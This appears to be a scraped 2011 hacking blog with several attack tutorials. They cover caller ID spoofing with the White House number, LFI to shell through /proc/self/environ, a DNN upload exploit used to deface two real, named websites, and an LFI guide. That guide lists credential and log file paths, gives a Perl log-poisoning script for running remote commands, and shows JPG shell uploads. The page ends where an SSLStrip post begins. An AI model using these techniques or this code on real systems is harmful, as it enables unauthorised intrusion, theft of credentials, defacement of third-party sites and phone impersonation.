VoIP Hacks: How to Spoof Your Caller ID

11/01/2011 rahlabs 1

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZUsI24P4Q03_WOqsfqLVkG2OujdHf2zKziY-PXPlMYHAeaa1vB_xEO3ON1vlDofYkZiOpC-wkHKnUp4h_7NsjFbuz1rXANKJdFERxIe0Yj7826Oqg15QhuyKzow5VdMfqWHSjJTUWcwE/s1600/voip-hacked.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="How to Spoof Your Caller ID" border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZUsI24P4Q03_WOqsfqLVkG2OujdHf2zKziY-PXPlMYHAeaa1vB_xEO3ON1vlDofYkZiOpC-wkHKnUp4h_7NsjFbuz1rXANKJdFERxIe0Yj7826Oqg15QhuyKzow5VdMfqWHSjJTUWcwE/s1600/voip-hacked.jpg" title="Caller ID Spoofing" width="320" /></a></div>
<br />
A fun prank is to call friends, family, or strangers from the White House's phone number (202 456-2121). The reason that this is possible is that Vonage, Skype, and other VoIP providers fundamentally must be able to fake caller ID in order to route calls from the internet onto public phone networks (so presumably they've been doing some lobbying over the years).<br />
<b style="margin: 0px; padding: 0px;">A Brief Technical Overview of Caller ID Spoofing:</b><br />
What we'll do is register a free account at an ITSP, or Internet Telephony Service Provider, which acts as the bridge between the internet and the public American (or otherwise) analog telephony networks. We'll then configure the ITSP to use the White House's phone number as our outbound caller ID. Finally, we'll connect to the ITSP using a free VoIP client, or softphone, to make our call using a PC.<br />
<div style="margin: 0px 0px 1.571em; padding: 0px;">
<b style="margin: 0px; padding: 0px;">The 10-Minute Step-by-Step Process:</b></div>
<ol style="margin: 0px 0px 1.571em 1.571em; padding: 0px;">
<li style="margin: 0px; padding: 0px;">  Register a free account on <a href="http://www.sipgate.com/" style="color: #2361a1; margin: 0px; padding: 0px; text-decoration: underline;">SIPGate.com.</a></li>
<li style="margin: 0px; padding: 0px;">Download <a href="http://www.counterpath.com/x-lite.html" style="color: #2361a1; margin: 0px; padding: 0px; text-decoration: underline;">X-Lite</a>, a free VoIP client.</li>
<li style="margin: 0px; padding: 0px;">Log in to SIPGate, then go to Settings–>Caller ID.</li>
<li style="margin: 0px; padding: 0px;">Enter 202-456-2121 as the Caller ID and click "Save."</li>
<li style="margin: 0px; padding: 0px;">Go back to your SIPGate Settings screen and click "SIP Credentials."</li>
<li style="margin: 0px; padding: 0px;">Leave that window alone for a moment.</li>
<li style="margin: 0px; padding: 0px;">  Open X-Lite and go to Menu–>SIP Account Settings–>Add.</li>
<li style="margin: 0px; padding: 0px;">  Use <a href="http://www.sipgate.com/faq/article/397/How_do_I_set_up_my_VoIP_device" style="color: #2361a1; margin: 0px; padding: 0px; text-decoration: underline;">these instructions</a> to configure your SIP Account Settings on X-Lite using your SIP Credentials.</li>
<li style="margin: 0px; padding: 0px;">Dial any number and enjoy!</li>
</ol>
<br /><br /></div>

A fun prank is to call friends, family, or strangers from the White House's phone number (202 456-2121). The reason that this is pos...

Shell by LFI - Method proc / self / environ

10/30/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjbYwWDfqkxa_gTF83wYEqKY1l2bwgA136U7N3JiX01cXuy-cyHYcqmXKZLHkJnrg0JbvVXqxhCZ0pkVaZM5qjDYC-u80FWy1lM3AiC4rQs_mjyr6qtYnhAPyT4bbWVPxRqLmuUT-xNh-/s1600/lfi+shell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMjbYwWDfqkxa_gTF83wYEqKY1l2bwgA136U7N3JiX01cXuy-cyHYcqmXKZLHkJnrg0JbvVXqxhCZ0pkVaZM5qjDYC-u80FWy1lM3AiC4rQs_mjyr6qtYnhAPyT4bbWVPxRqLmuUT-xNh-/s320/lfi+shell.jpg" width="320" /></a></div>
<br />
<div class="para">
1 - Introduction<br />
2 - Discovery LFI<br />
3 - check if / proc / self / environ is accessible<br />
4 - malicious code injection<br />
5 - Access to the shell<br />
6 - Thanks<br />
<br />
<h3>
>> 1 - Introduction</h3>
<br />
In this tutorial I will show how to obtain a shell on a site using your Local File Inclusion and<br />
injecting malicious code in proc / self / environ.Este a tutorial that explains everything step by step.<br />
<br />
<h3>
>> 2 - Discovery LFI</h3>
<br />
- Now a site to find a vulnerable target to Local File <a href="http://inclusion.am/&t=ANT-2vyV6xI0BQ6QZt6MCFMkk1WGnFzI3BVF6BHPOhTLLepkcou6qJpV89btnA5JBcIcq4CgFTjFWubyjMexdr4Egu0z4qwcLwAAAAAAAAAA" style="color: #02679c; text-decoration: none;" target="_blank">Inclusion.Am</a> found to verify<br />
<br />
<a href="http://www.website.com/view.php?page%3Dcontact.php&amp" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=contact.php</a><br />
<br />
- Now to replace contact.php with .. / and the URL will become<br />
<br />
<a href="http://www.website.com/view.php?page%3D../" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../</a><br />
<br />
and have an error.<br />
<br />
Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / <a href="http://website.com/" style="color: #02679c; text-decoration: none;" target="_blank">website.com</a> / view.php on line 1337 good chance to have a vulnerability type Local File <a href="http://inclusion.sa/" style="color: #02679c; text-decoration: none;" target="_blank">Inclusion.Sa</a> move on.</div>
<br />
<div class="listitem">
- Check if we can access the <br />
<div class="highlight">
etc/passwd </div>
to see if it is vulnerable to Local File <a href="http://inclusion.sa/" style="color: #02679c; text-decoration: none;" target="_blank">Inclusion.Sa</a>make a request:<br />
<br />
<a href="http://www.website.com/view.php?page%3D../../../etc/passwd" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../etc/passwd</a><br />
<br />
have an error and the file etc / passwd is not included.<br />
<br />
Warning: include (../) [function.include]: failed to open stream: No such file or directory in / home / sirgod / public_html / <a href="http://website.com/" style="color: #02679c; text-decoration: none;" target="_blank">website.com</a> / view.php on line 1337 climbed some directors<br />
<br />
<a href="http://www.website.com/view.php?page%3D../../../../../etc/passwd" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../../../etc/passwd</a><br />
<br />
We successfully included file etc / passwd.<br />
<div class="content shadow-radial">
root: x: 0:0: root: / root: / bin / bash bin: x: 1:1: bin: / bin: / sbin / Nologin daemon: x: 2:2: daemon: / sbin: / sbin / Nologin adm: x: 3:4: adm: / var / adm: / sbin / Nologin<br />
<br />
lp: x: 4:7: lp: / var / spool / lpd: / sbin / Nologin sync: x: 5:0: sync: / sbin: / bin / sync shutdown: x: 6:0: shutdown: / sbin : / sbin / shutdown halt: x: 7:0: halt: / sbin: / sbin / halt<br />
<br />
mail: x: 8:12: mail: / var / spool / mail: / sbin / Nologin news: x: 9:13: news: / etc / news: UUCP: x: 10:14: UUCP: / var / spool / UUCP: / sbin / Nologin<br />
<br />
operator: x: 11:0: operator: / root: / sbin / Nologin games: x: 12:100: games: / usr / games: / sbin / Nologin test: x: 13:30: test: / var / test : / sbin / Nologin ftp:x:14:50:FTP<br />
User: / var / ftp: / sbin / Nologin nobody: x: 99:99: Nobody: /: / sbin / Nologin</div>
</div>
<br />
<h3>
>> 3 - check if / proc / self / environ is accessible</h3>
<br />
- Now to see if / proc / self / environ is accesibil.O to replace etc / passwd with / proc / self / environ<br />
<br />
<a href="http://www.website.com/view.php?page%3D../../../" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../</a> ... LF / environ<br />
<br />
If you get something like<br />
<div class="content shadow-radial">
DOCUMENT_ROOT = / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml, q = 0.9, application / xhtml + xml, image / png,<br />
<br />
image / jpeg, image / gif, image / x-xbitmap, * / *, q = 0.1 PHPSESSID = HTTP_COOKIE = HTTP_HOST =<a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> 134cc7261b341231b9594844ac2ad7ac<br />
<br />
http://<a href="http://www.website.com/index.php?view%3D../../../../../../etc/passwd" style="color: #02679c; text-decoration: none;" target="_blank">Http://www.website.com/index.php?view=../../../../../../etc/passwd</a> HTTP_REFERER = HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1, U , en) Presto/2.2.15<br />
<br />
Version/10.00 PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x .1 xx.4x.1xx<br />
<br />
REMOTE_PORT = 35665 REQUEST_METHOD = GET REQUEST_URI = / index.php? View =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron<br />
<br />
SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = <a href="mailto:webmaster@website.com">webmaster@website.com</a><br />
<br />
SERVER_NAME = <a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =<br />
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at <a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> Port 80</div>
proc / self / environ is accesibil.Daca get a blank page, an error means it is not accessible or operating system is FreeBSD.<br />
<br />
<br />
<h3>
>> 4 - malicious code injection</h3>
<br />
- Now let us inject malicious code in proc / self / environ.Cum we do this? Inject code in HTTP User-Agent header.<br />
Use Tamper Data addon's for Firefox to change User-Agent-ul.Porniti Tamper date and make a request to the URL:<br />
<br />
<a href="http://www.website.com/view.php?page%3D../../../" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com/view.php?page=../../../</a> ... LF / environ<br />
<br />
Choose Tamper and User-Agent field write the following code:<br />
<br />
A shell.php available @ ;?><br />
<br />
Then, submit the request.<br />
<br />
Our command will be executed in<br />
through function system (), and our shell will be creat.Daca does not work, try exec () because system () can be<br />
restricted on a server in php.ini<br />
<br />
<h3>
>> 5 - Access to the shell</h3>
<br />
- Now check if our code has been injected with malicious <a href="http://succes.sa/" style="color: #02679c; text-decoration: none;" target="_blank">succes.Sa</a> see if the shell is present.<br />
<br />
<a href="http://www.website.com/" style="color: #02679c; text-decoration: none;" target="_blank">www.website.com</a> / shell.php<br />
<br />
Shell was successful.<br />
<br />
i hope you enjoy!!!<br />
</div>

Hacking Hacking Tutorials LFI Tutorials Shell by LFI - Method proc / self / environ

1 - Introduction 2 - Discovery LFI 3 - check if / proc / self / environ is accessible 4 - malicious code injection 5 - Access to th...

Hack Website Using DNN [Dot Net Nuke] Exploit

10/25/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEOlAHxQVzBG9xgDW6ao9teTPGEjyUjZOEu7gCwSUV3tUHS0Tnz_P_oX5dq5k766LqaifOZlsH0mQlie96lntu-D7qQXQ0hxEN8moSiB_o7X9hSNjTjDVuhLks8BFIEzneTh4PPFHyMhI/s1600/dotnetnuke-large.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEOlAHxQVzBG9xgDW6ao9teTPGEjyUjZOEu7gCwSUV3tUHS0Tnz_P_oX5dq5k766LqaifOZlsH0mQlie96lntu-D7qQXQ0hxEN8moSiB_o7X9hSNjTjDVuhLks8BFIEzneTh4PPFHyMhI/s1600/dotnetnuke-large.gif" width="320" /></a></div>
<br />
<div class="post-body entry-content">
Using google DORK try to find the vulnerable website.<br />
<br />
<b>inurl:"/portals/0"</b><br />
<br />
You can also modify this google dork according to your need & requirement.I have found these 2 website vulnerable to this attack:<br />
<br />
<a href="http://www.wittur.se/">http://www.wittur.se/</a><br />
<a href="http://www.bsd405.org/">http://www.bsd405.org/</a><br />
<br />
n00bs can also try both of these websites for testing purpose.Open the home page and check any image which is located in <b>/portals/0/</b>Check the location of the image. It should be located in <b>/portals/0/</b><br />
<br />
For e.g. in case of <a href="http://www.wittur.se/">http://www.wittur.se</a> ..the image is located at location- <a href="http://www.wittur.se/Portals/0/SHM.jpg">http://www.wittur.se/Portals/0/SHM.jpg</a><br />
<br />
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.<br />
<br />
Now here is the exploit<br />
<br />
<b>Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</b><br />
<br />
<b>HOW TO RUN ?</b><br />
Simply copy paste it as shown below:<br />
<br />
<a href="http://www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx">www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</a><br />
<br />
You will see the portal where it will ask you to upload. Select the third option <b>File ( A File On Your Site</b><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyivlTA96p8SVSh0zoTMd77LtT77BUAVLq2WRfM3gLrGG8LeNbGDLfOYY4nBSQSP73TYVbvt8Q2PjlxEF6FPgMbCxjIRYt0x3iQ_hfPwCLp5R8xI9ofa9op1Vg75buViwO3f1Wf2GVhMA/s1600/1.JPG" style="color: #3778cd; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5498613501494723714" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyivlTA96p8SVSh0zoTMd77LtT77BUAVLq2WRfM3gLrGG8LeNbGDLfOYY4nBSQSP73TYVbvt8Q2PjlxEF6FPgMbCxjIRYt0x3iQ_hfPwCLp5R8xI9ofa9op1Vg75buViwO3f1Wf2GVhMA/s400/1.JPG" style="background-color: transparent; border: 1px solid transparent; display: block; height: 273px; margin: 0px auto 10px; padding: 8px; position: relative; text-align: center; width: 400px;" /></a><br />
After selecting the third option, replace the URL bar with below script<br />
<b>javascript:__doPostBack('ctlURL$cmdUpload','')</b><br />
<br />
After running this JAVA script, you will see the option for <b>Upload Selected File. </b>Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...<b>BINGGOOOOOOOOOOOO you have hacked the website.</b><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXdSc71TaPWUymCeu8Rvx67VaKbViBjbaTgM0ZcWbHk7bX3MoiiLOdjFI_ek2x_X1xgAADyoS-CtU4hqMUED8Dv3QQiIvBvwz81iKB8PWFgFgQQNPpkeFAM7y2CF6066zR_tPU_D5rrWU/s1600/2.JPG" style="color: #3778cd; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5498613494553959698" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXdSc71TaPWUymCeu8Rvx67VaKbViBjbaTgM0ZcWbHk7bX3MoiiLOdjFI_ek2x_X1xgAADyoS-CtU4hqMUED8Dv3QQiIvBvwz81iKB8PWFgFgQQNPpkeFAM7y2CF6066zR_tPU_D5rrWU/s400/2.JPG" style="background-color: transparent; border: 1px solid transparent; cursor: pointer; display: block; height: 286px; margin: 0px auto 10px; padding: 8px; position: relative; text-align: center; width: 400px;" /></a><br />
<br />
</div>
</div>

DNN Dot Net Hacking Hacking Tutorials Tutorials Hack Website Using DNN [Dot Net Nuke] Exploit

Using google DORK try to find the vulnerable website. inurl:"/portals/0" You can also modify this google dork according t...

Step by Step guide to LFI (Local File Inclusion)

10/06/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBxFC_eDR4POwk_AJI_TmYChTSo39ls7y9lpAFGWXY1QAjJPTfHa33WN8ruMWO_bbUS9LqoVgPpEbZbaoycvhqYGYRmj6jESuxZ4FCz4u8H_DwsLftESh24mSCjj5fxr8KIJhQPS7yjzd3/s1600/lfi-3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBxFC_eDR4POwk_AJI_TmYChTSo39ls7y9lpAFGWXY1QAjJPTfHa33WN8ruMWO_bbUS9LqoVgPpEbZbaoycvhqYGYRmj6jESuxZ4FCz4u8H_DwsLftESh24mSCjj5fxr8KIJhQPS7yjzd3/s400/lfi-3.jpg" width="400" /></a></div>
<br />
This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).<br />
<div>
<span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"></span><br />
<div class="post-body entry-content" style="line-height: 1.4; position: relative; width: 506px;">
<span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="2238877135876300672"><b> First lets take a look at a php code that is vulnerable to LFI:<br />
PHP Code:</b><br />
</span></span><br />
<div class="program glow">
<pre><span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="2238877135876300672"><code class="prettyprint"><?php 
$page = $_GET[page];
include($page);
?></code></span></span></pre>
</div>
<span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="2238877135876300672">Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.<br />
<br />
Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type<a href="http://victim.com/test/test.php" style="color: #3778cd; text-decoration: none;">victim.com/test/test.php</a> will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru <a href="http://victim.com/index.php?page=test/test.php" style="color: #3778cd; text-decoration: none;">victim.com/index.php?page=test/test.php</a> , see what happened there? Now, if the index.php was in<a href="http://victim.com/test/index.php" style="color: #3778cd; text-decoration: none;">victim.com/test/index.php</a> and the test.php in <a href="http://victim.com/test.php" style="color: #3778cd; text-decoration: none;">victim.com/test.php</a> you will have to type<a href="http://victim.com/test/index.php?page=../test.php" style="color: #3778cd; text-decoration: none;">victim.com/test/index.php?page=../test.php</a> . The ../ is called directory<br />
transversal using that will allow you to go up in the directories.<br />
<br />
Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):<br />
<br />
Quote:<br />
<span class="system pop"><br />
<a href="http://victim.com/index.php?page=../../../../../../../etc/passwd">victim.com/index.php?page=../../../../../../../etc/passwd</a></span><br />
If you don't know what to do with the content of etc/passwd then continue reading! :puah[1]: The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:<br />
<br />
Quote:<br />
<span class="system pop"><br />
username: passwd:UID:GID:full_name:directory:shell</span><br />
For example:<br />
<br />
Quote:<br />
<span class="system pop">username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh</span><br />
All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:<br />
<br />
Quote:<br />
<span class="system pop">username:x:503:100:FullName:/home/username:/bin/sh</span><br />
As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many<br />
processes, thats why you have access to it).<br />
You can also sometimes see something like this:<br />
<br />
Quote:<br />
<span class="system pop">username:!:503:100:FullName:/home/username:/bin/sh</span><br />
The ! indicates that the encoded password is stored in the etc/security/passwd file.<br />
Heres a couple of places that may be interesting to "visit":<br />
<br />
Quote:<br />
<div class="content shadow-radial">
/etc/passwd<br />
/etc/shadow<br />
/etc/group<br />
/etc/security/group<br />
/etc/security/passwd<br />
/etc/security/user<br />
/etc/security/environ<br />
/etc/security/limits<br />
/usr/lib/security/mkuser.default</div>
You will probably need to google for it as this is not the right tutorial to it.<br />
Just one more quick thing, its also common to find a vulnerable code like:<br />
PHP Code:<br />
<div class="program glow">
<pre><code class="prettyprint">
<?php
$page = $_GET["page"];
include("$page.php");
?>
</code></pre>
</div>
In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:<br />
<a href="http://victim.com/index.php?file=../../../../../../../../etc/passwd" style="color: #3778cd; text-decoration: none;">victim.com/index.php?file=../../../../../../../../etc/passwd</a><br />
<br />
it will retrieve:<br />
<a href="http://victim.com/index.php?file=../../../../../../../../etc/passwd" style="color: #3778cd; text-decoration: none;">victim.com/index.php?file=../../../../../../../../etc/passwd</a><b>.php</b> that file don't exist, and you will see an error message, so you need to apply the null byte ():<br />
<br />
<a href="http://victim.com/index.php?file=../../../../../../../../etc/passwd" style="color: #3778cd; text-decoration: none;">victim.com/index.php?file=../../../../../../../../etc/passwd</a><b></b><br />
<b></b><br />
With the null byte the server will ignore everything that comes after .<br />
There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin! :jeerat.gif<br />
We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:<br />
<br />
Quote:<br />
<div class="content shadow-radial">
../apache/logs/error.log<br />
../apache/logs/access.log<br />
../../apache/logs/error.log<br />
../../apache/logs/access.log<br />
../../../apache/logs/error.log<br />
../../../apache/logs/access.log<br />
../../../../../../../etc/httpd/logs/acces_log<br />
../../../../../../../etc/httpd/logs/acces.log<br />
../../../../../../../etc/httpd/logs/error_log<br />
../../../../../../../etc/httpd/logs/error.log<br />
../../../../../../../var/www/logs/access_log<br />
../../../../../../../var/www/logs/access.log<br />
../../../../../../../usr/local/apache/logs/access_log<br />
../../../../../../../usr/local/apache/logs/access.log<br />
../../../../../../../var/log/apache/access_log<br />
../../../../../../../var/log/apache2/access_log<br />
../../../../../../../var/log/apache/access.log<br />
../../../../../../../var/log/apache2/access.log<br />
../../../../../../../var/log/access_log<br />
../../../../../../../var/log/access.log<br />
../../../../../../../var/www/logs/error_log<br />
../../../../../../../var/www/logs/error.log<br />
../../../../../../../usr/local/apache/logs/error_log<br />
../../../../../../../usr/local/apache/logs/error.log<br />
../../../../../../../var/log/apache/error_log<br />
../../../../../../../var/log/apache2/error_log<br />
../../../../../../../var/log/apache/error.log<br />
../../../../../../../var/log/apache2/error.log<br />
../../../../../../../var/log/error_log<br />
../../../../../../../var/log/error.log</div>
Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser <a href="http://victim.com/" style="color: #3778cd; text-decoration: none;">victim.com/</a> and the php code will be logged because it "dosen't exist".<br />
<br />
This possibly won't work because if you go look into the log you will probably see the php code like this:<br />
<br />
Quote:<br />
%3C?%20passthru(\$_GET[cmd])%20?><br />
because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:<br />
Code:<br />
<div class="program glow">
<pre><code class="prettyprint">
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="<b><a href="http://victim.com/" style="color: #3778cd; text-decoration: none;">victim.com</a></b>";
$path="<b>/folder/</b>";
$code="";
$log = "<b>../../../../../../../etc/httpd/logs/error_log</b>";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path.$code." HTTP/1.1\r\n";
print $socket "User-Agent: ".$code."\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code sucssefully injected in $log \n";
print "\nType command to run or exit to end: ";
$cmd = <u></u>;
while($cmd !~ "exit") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";
print $socket "GET ".$path."<b>index.php=</b>".$log."&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$site."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($show = <$socket>)
{
print $show;
}
print "Type command to run or exit to end: ";
$cmd = <u></u>;
}
</code></pre>
</div>
Copy/paste that, save it as <a href="http://whatever.pl/" style="color: #3778cd; text-decoration: none;">whatever.pl</a> and change what is in <b>bold</b> accordingly to your victim site. If the vulnerable code is in <a href="http://victim.com/main/test.php" style="color: #3778cd; text-decoration: none;">victim.com/main/test.php</a> you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!<br />
<br />
That script will inject the code and then will ask you for a command to run on the server! You know what to do now! :secret.gif<br />
Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications.<br />
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website!<br />
<br />
This is a quick explanation, for a better understanding you can view the video at<u><a href="http://www.anonym.to/?http://www.milw0rm.com/video/watch.php?id=57" style="color: #3778cd; text-decoration: none;">http://www.milw0rm.com/video/watch.php?id=57</a></u><br />
You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the <u>edjpgcom download</u><a href="http://www.anonym.to/?http://software.security-shell.com/index.php?dir=&file=edjpgcom.zip" style="color: #3778cd; text-decoration: none;">http://software.security-shell.com/i...e=edjpgcom.zip</a>program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your <a href="http://victim.com/" style="color: #3778cd; text-decoration: none;">victim.com</a> has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!<br />
<br />
Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!<br />
<br />
After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:<br />
<br />
Quote:<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/sitefolder/public_html/</b>includes/view.php on line 37<br />
If you can't force an error go back to the etc/passwd file:<br />
<br />
Quote:<br />
username:kbeMVnZM0oL7I:503:100:FullName:<b>/home/username</b>:/bin/sh<br />
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!<br />
<br />
Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.<br />
In your browser type this (again, the nr of ../ may vary):<br />
<br />
Quote:<br />
<a href="http://victim.com/home/" style="color: #3778cd; text-decoration: none;">victim.com/index.php=../../../../../../../../../home/</a><b>the_other_site_dir</b>/public_html/<b>path_to_your_avatar</b>/avatar.jpg<br />
In order "words" should look like this (using fictitious "names"):<br />
<br />
Quote:<br />
<a href="http://victim.com/home/arcfull/public_html/forum/uploads/avatar.jpg" style="color: #3778cd; text-decoration: none;">victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg</a><br />
After you type this you will see the result of the code inserted in the image!<br />
<span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><br />
</span> <span class="Apple-style-span" style="background-color: white; color: #444444; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; font-size: 13px; line-height: 18px;"><span id="2238877135876300672"><span style="color: red;">Note:<a href="http://www.cloudscan.me/p/local-file-inclusion-lfi-information.html" target="_blank">For further reading.</a></span> </span></span></span></span></div>
</div>
<br /><br /></div>

Hacking Hacking Tutorials LFI Tutorials Step by Step guide to LFI (Local File Inclusion)

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion). First lets take a look a...

Perl Script for SSLStrip MITM Attack

10/02/2011 rahlabs 0

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUbrddN25dPBr1bGVnAukjjvs3Njxufs1kfnDa9cGVbDXhPtPZP6S1c3PZ0yG943GIw35u2Yfdnyr4gBLTOtrJs_Rxpg1MeiPBnCPOmo1mWXT_zbRDzl9CaiCPyF7GWS_CW4hhppHKyP40/s1600/ssl+strip.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUbrddN25dPBr1bGVnAukjjvs3Njxufs1kfnDa9cGVbDXhPtPZP6S1c3PZ0yG943GIw35u2Yfdnyr4gBLTOtrJs_Rxpg1MeiPBnCPOmo1mWXT_zbRDzl9CaiCPyF7GWS_CW4hhppHKyP40/s640/ssl+strip.jpg" width="640" /></a></div>
<br />
<div style="margin: 0px; padding: 0px;">
